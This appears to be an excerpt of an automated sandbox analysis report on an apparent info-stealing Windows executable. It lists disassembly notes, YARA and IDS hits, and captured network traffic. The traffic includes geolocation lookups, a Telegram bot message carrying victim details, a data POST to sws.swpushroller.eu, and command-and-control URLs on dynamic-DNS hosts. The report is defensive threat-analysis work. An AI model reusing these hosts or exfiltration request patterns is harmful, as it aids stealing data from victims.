                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06421A09h0_2_06421738
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642BB33h0_2_0642B838
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06422791h0_2_064224C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064299BBh0_2_064296C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642C4C3h0_2_0642C1C8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06421EA1h0_2_06421BD0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642EFCBh0_2_0642ECD0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064207A9h0_2_064204D8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064281D3h0_2_06427ED8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06425EB1h0_2_06425BE0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642ACDBh0_2_0642A9E0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064247B9h0_2_064244E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642D7E3h0_2_0642D4E8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064230C1h0_2_06422DF0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064294F3h0_2_064291F8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06424C51h0_2_06424980
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642737Bh0_2_06427080
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06423559h0_2_06423288
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06429E83h0_2_06429B88
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642C98Bh0_2_0642C690
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642F493h0_2_0642F198
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06421571h0_2_064212A0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642869Bh0_2_064283A0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642B1A3h0_2_0642AEA8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06425581h0_2_064252B0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0642DCABh0_2_0642D9B0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06423E89h0_2_06423BB8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06462983h0_2_06462688
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 0646033Bh0_2_06460040
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06461B2Bh0_2_06461830
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06461FF3h0_2_06461CF8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06461194h0_2_06460E98
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06461663h0_2_06461368
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06460803h0_2_06460508
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 064624BBh0_2_064621C0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then jmp 06460CCBh0_2_064609D0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_064A4800
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_064A3EA8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_064A4C18
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_064A4C16
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]0_2_064A3E72

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2011/11/2024%20/%2005:56:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 9112Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49748
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49755
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2011/11/2024%20/%2005:56:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: sws.swpushroller.eu
                Source: unknownHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 9112Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 10 Nov 2024 20:44:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu/swsk/P4.php
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu/swsk/api.php
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
